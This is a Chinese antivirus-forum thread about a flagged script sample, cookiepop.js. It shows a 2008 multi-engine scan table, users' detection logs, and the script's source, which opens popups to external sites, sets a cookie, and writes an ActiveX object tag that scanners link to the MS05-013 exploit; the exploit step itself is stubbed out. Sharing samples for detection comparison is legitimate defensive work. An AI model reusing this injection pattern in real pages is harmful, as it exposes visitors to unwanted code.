脚本病毒，BD，360，AVAST，AVG PASS

VISN

AhnLab-V3	2008.7.29.1	2008.08.02	VBS/Codebaseexec
AntiVir	7.8.1.15	2008.08.01	EXP/HTML.CodeBaseExec.107
Authentium	5.1.0.4	2008.08.01	JS/MS05013
Avast	4.8.1195.0	2008.08.02	VBS:Malware-gen
AVG	8.0.0.156	2008.08.02	-
BitDefender	7.2	2008.08.02	-
CAT-QuickHeal	9.50	2008.08.02	-
ClamAV	0.93.1	2008.08.02	Exploit.MS05-013
DrWeb	4.44.0.09170	2008.08.02	-
eSafe	7.0.17.0	2008.07.29	-
eTrust-Vet	31.6.6002	2008.08.02	-
Ewido	4.0	2008.08.02	Not-A-Virus.Exploit.HTML.CodeBaseExec
F-Prot	4.4.4.56	2008.08.01	JS/MS05013
F-Secure	7.60.13501.0	2008.08.02	Exploit.HTML.CodeBaseExec
Fortinet	3.14.0.0	2008.08.02	JS/CodeBaseExec.B!exploit
GData	2.0.7306.1023	2008.08.02	Exploit.HTML.CodeBaseExec
Ikarus	T3.1.1.34.0	2008.08.02	Exploit.HTML.CodeBaseExec
K7AntiVirus	7.10.402	2008.08.02	-
Kaspersky	7.0.0.125	2008.08.03	Exploit.HTML.CodeBaseExec
McAfee	5352	2008.08.01	-
Microsoft	1.3807	2008.08.03	Exploit:JS/MS05013.A
NOD32v2	3319	2008.08.02	HTML/Exploit.CodeBaseExec
Norman	5.80.02	2008.08.01	-
Panda	9.0.0.4	2008.08.02	Bck/Hupigon.AZG
PCTools	4.4.2.0	2008.08.02	-
Prevx1	V2	2008.08.03	-
Rising	20.55.42.00	2008.08.02	Hack.Exploit.HTML.IESpoof.a
Sophos	4.31.0	2008.08.02	-
Sunbelt	3.1.1537.1	2008.08.01	-
Symantec	10	2008.08.03	Hacktool
TheHacker	6.2.96.392	2008.08.02	-
TrendMicro	8.700.0.1004	2008.08.01	HTML_CODEBASE.CP
VBA32	3.12.8.2	2008.08.02	Exploit.HTML.CodeBaseExec
ViRobot	2008.8.1.1321	2008.08.01	-
VirusBuster	4.5.11.0	2008.08.02	-
Webwasher-Gateway	6.6.2	2008.08.02	Exploit.HTML.CodeBaseExec.107

yeandwo

avast明明扫到了。怎么说PASS，

电影结束了

Exploit.HTML.CodeBaseExec（KAV引擎）

Palkia

病毒        2008-08-03  10:05:29        C:\Documents and Settings\Administrator\桌面\cookiepop.rar\cookiepop.js        JS.CodeBaseExec.va.1950        跳过，未处理

6466336

下个试试

qigang

瑞星病毒查杀结果报告

清除病毒种类列表：

病毒： Hack.Exploit.HTML.IESpoof.a

MAC 地址：00:11:5B:F3:6D:69

用户来源：互联网

软件版本：20.55.60

qigang

//function openwin()
//{
//window.showModelessDialog("/www.thethirdmedia.com.htm","scroll:0;status:0;help:0;resizable:1;dialogWidth:10px;dialogHeight:10px")
//}

function shellscript()
{
   var now = new Date();
   var sec = now.getSeconds();
   var poll = sec % 3;
   var popurl = "";
   if(poll == 0)
   {
          popurl = "http://www.singbomb.com/hotsingerpp.htm";
   }
   else
   {
          popurl = "http://www.thethirdmedia.com/pc/pjbj/";
   }
        window.focus();
        open(popurl,"_blank","scrollbar=no");
}

function openwinaction()
{       
  try
  {
        ;
  }
  catch(exception){;}
}

function openwin()
{
        var xssdom = '<object id="x11111" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1" height="1" align="middle"></object>';
        xpop.innerHTML = xssdom;//document.write(xssdom);

        //xssdom.ActivateApplets = "1";
        //xssdom.ActivateActiveXControls = "1";
        setTimeout('openwinaction()','500');
}



function getCookie(cookiename)
{
        var cookiestring=""+document.cookie;
        var index1=cookiestring.indexOf(cookiename);
       
        if (index1==-1 || cookiename=="") return "";
       
        var index2=cookiestring.indexOf(';',index1);
        if (index2==-1) index2=cookiestring.length;
        //return unescape(cookiestring.substring(index1+cookiename.length+1,index2));
       
        var rvalue = unescape(cookiestring.substring(index1 + cookiename.length + 1 , index2));
       
        return rvalue;
}




function newcookie(id,value,idinteral)
{
        var expires=new Date();       
        expires.setTime(expires.getTime()+ idinteral*60*1000);//idintreal * 60s       
        var expiryDate=expires.toGMTString();
        document.cookie=id+"="+value+";path=/;expires="+expiryDate;//放置到根
        //alert(document.cookie);
}

function loadpopup()
{
if (getCookie("xbtAlerted")=="")
{
  newcookie("xbtAlerted","yes",60);
  //openwin();
}
else
  {}
}

尤金卡巴斯基

检测到：木马程序 Exploit.HTML.CodeBaseExec        URL: http://bbs.kafan.cn/attachment.p ... 38775//cookiepop.js